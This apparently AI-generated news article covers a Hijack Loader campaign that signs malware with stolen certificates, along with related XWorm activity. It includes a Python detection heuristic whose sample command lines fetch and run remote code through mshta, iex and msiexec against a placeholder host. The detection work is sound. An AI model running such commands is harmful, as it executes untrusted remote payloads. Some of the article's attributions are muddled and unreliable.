

Ethical Hacking News

New Malware Campaign Exploits Stolen Code-Signing Certificates to Spread Hijack Loader Malware




A new malware campaign has been uncovered by researchers at French cybersecurity firm HarfangLab, leveraging stolen code-signing certificates to deliver hijack loader malware. This threat serves as a reminder that traditional security measures alone may not be enough to protect against sophisticated cyber attacks.

  • The cybersecurity world has been hit by a new malware campaign leveraging stolen code-signing certificates.
  • Because the malicious binaries are signed with legitimate code-signing certificates, a valid signature alone no longer separates them from trusted software, which blunts traditional security measures.
  • The malware, known as Hijack Loader or DOILoader, first emerged in September 2023 and has since become a persistent threat.
  • Attack chains involve tricking users into downloading pirated software or movies, often using fake CAPTCHA pages and PowerShell scripts.
  • The ultimate goal is to deploy an information stealer known as Lumma.
  • Researchers observed three different versions of the PowerShell script used in these attacks, each leveraging a different method to execute malicious code.
  • The attack campaign has evolved from DLL side-loading to using signed binaries to evade detection by security software.
  • The use of legitimate code-signing certificates highlights the evolving nature of cyber threats and the need for continuous vigilance.



The cybersecurity world has been hit by a new and sophisticated malware campaign that leverages stolen code-signing certificates to deliver hijack loader malware. Researchers at French cybersecurity firm HarfangLab have uncovered this threat, which involves the use of legitimate code-signing certificates to sign malicious binaries, rendering traditional security measures ineffective.

According to HarfangLab, this malware campaign is part of a larger trend in cyber attacks that involve tricking users into downloading pirated software or movies. However, recent variations of these campaigns have taken a more sophisticated approach, involving fake CAPTCHA pages and PowerShell scripts that execute code hosted on remote servers. The ultimate goal of these attack chains is to deploy an information stealer known as Lumma.

Hijack Loader, also known as DOILoader, IDAT Loader, and SHADOWLADDER, first emerged in September 2023 and has since become a persistent threat. Attack chains involving the malware loader typically involve tricking users into downloading a booby-trapped binary under the guise of pirated software or movies. The latest version of this malware campaign uses stolen code-signing certificates to sign the malicious binaries, making them difficult for security software to detect.

The researchers observed three different versions of the PowerShell script used in these attacks, each leveraging a different method to execute malicious code:

1. A PowerShell script that leverages mshta.exe to execute code hosted on a remote server.
2. A remotely-hosted PowerShell script that's directly executed via the Invoke-Expression cmdlet (aka iex).
3. A PowerShell script that employs msiexec.exe to download and execute a payload from a remote URL.
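The three execution methods above share a common trait a defender can key on: a Windows utility (mshta.exe, msiexec.exe, or PowerShell's iex) being handed content from a remote URL. The following detection heuristic, added here as an example and not from HarfangLab or the original article, classifies process command lines against those three patterns; the sample command lines and the example.invalid hostnames are constructed for illustration.

```python
import re

# Heuristics for the three remote-execution methods described above.
# They run over process-creation command lines (e.g. Sysmon Event ID 1) and
# are a starting point for a detection rule, not a complete one.
URL = r"https?://[^\s'\"]+"
DOWNLOADERS = r"(?:iwr|invoke-webrequest|irm|invoke-restmethod|downloadstring)"
EVALUATORS = r"(?:iex|invoke-expression)"

RULES = [
    # 1. mshta.exe launched with a remote URL as its argument
    ("mshta-remote", re.compile(r"\bmshta(?:\.exe)?\b.*" + URL, re.IGNORECASE)),
    # 2. iex / Invoke-Expression fed by a web download, in either argument order
    ("iex-remote", re.compile(
        r"\b" + EVALUATORS + r"\b.*\b" + DOWNLOADERS + r"\b"
        r"|\b" + DOWNLOADERS + r"\b.*\|\s*" + EVALUATORS + r"\b", re.IGNORECASE)),
    # 3. msiexec.exe installing a package straight from a remote URL
    ("msiexec-remote", re.compile(
        r"\bmsiexec(?:\.exe)?\b.*[/-](?:i|package)\s+" + URL, re.IGNORECASE)),
]


def classify(cmdline: str):
    """Return the label of the first matching technique, or None if benign-looking."""
    for label, pattern in RULES:
        if pattern.search(cmdline):
            return label
    return None


def scan(lines):
    """Classify every command line; returns (label, cmdline) pairs for hits only."""
    return [(classify(line), line) for line in lines if classify(line)]


# Constructed sample command lines (not taken from the page or any real incident).
SAMPLE_CMDLINES = [
    "mshta.exe https://example.invalid/stage1.hta",
    "powershell.exe -w hidden -c \"iex (iwr 'https://example.invalid/s.ps1').Content\"",
    "powershell.exe -nop -c \"(New-Object Net.WebClient).DownloadString('https://example.invalid/x') | iex\"",
    "msiexec.exe /i https://example.invalid/setup.msi /qn",
    "msiexec.exe /i C:\\Installers\\vendor.msi /qn",  # local install: must not match
    "powershell.exe -c \"Get-ChildItem C:\\Temp\"",   # benign: must not match
]

if __name__ == "__main__":
    for label, cmd in scan(SAMPLE_CMDLINES):
        print(f"{label:15} {cmd}")
```

A local msiexec install or an ordinary PowerShell cmdlet produces no hit, so the rule keys on the remote-content trait rather than on the utility name alone.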

In addition to these PowerShell scripts, the ZIP archive used in these attacks contains a genuine executable that is susceptible to DLL side-loading and the malicious DLL (i.e., Hijack Loader) that is loaded instead. The sideloaded HijackLoader DLL decrypts and executes an encrypted file that conceals the final HijackLoader stage, whose job is to download and execute a stealer implant.

The delivery mechanism has changed from DLL side-loading to using several signed binaries in early October 2024, in an attempt to evade detection by security software. It's currently not clear if all the code-signing certificates were stolen or intentionally generated by the threat actors themselves, although HarfangLab assessed with low to medium confidence that it could be the latter. The certificates have since been revoked.

This malware campaign serves as a reminder that a code signature alone cannot serve as a baseline indicator of trustworthiness. In addition, SonicWall Capture Labs warned of a surge in cyber attacks infecting Windows machines with a malware dubbed CoreWarrior, which is a persistent trojan that attempts to spread rapidly by creating dozens of copies of itself and reaching out to multiple IP addresses.

Another phishing campaign has been observed delivering a commodity stealer and loader malware known as XWorm by means of a Windows Script File (WSF) that, in turn, downloads and executes a PowerShell script hosted on paste[.]ee. The PowerShell script subsequently launches a Visual Basic Script, which acts as a conduit to execute a series of batch and PowerShell scripts to load a malicious DLL that's responsible for injecting XWorm into a legitimate process ("RegSvcs.exe").

The latest version of XWorm (version 5.6) includes the ability to report response time, collect screenshots, read and modify the victim's hosts file, perform a denial-of-service (DoS) attack against a target, and remove stored plugins, indicating an attempt to avoid leaving a forensic trail.

Netskope Threat Labs security researcher Jan Michael Alcantara stated that XWorm is a multifaceted tool that can provide a wide range of functions to the attacker. The fact that this malware campaign exploits stolen code-signing certificates highlights the evolving nature of cyber threats and the need for continuous vigilance in the cybersecurity landscape.

In conclusion, the discovery of this new malware campaign serves as a wake-up call for organizations and individuals alike. The use of legitimate code-signing certificates to sign malicious binaries is a sophisticated tactic that can be difficult to detect, emphasizing the importance of staying informed about emerging threats and adapting security measures accordingly.



Related Information:

  • https://thehackernews.com/2024/10/researchers-uncover-hijack-loader.html


Published: Tue Oct 15 03:44:21 2024 by llama3.2 3B Q4_K_M
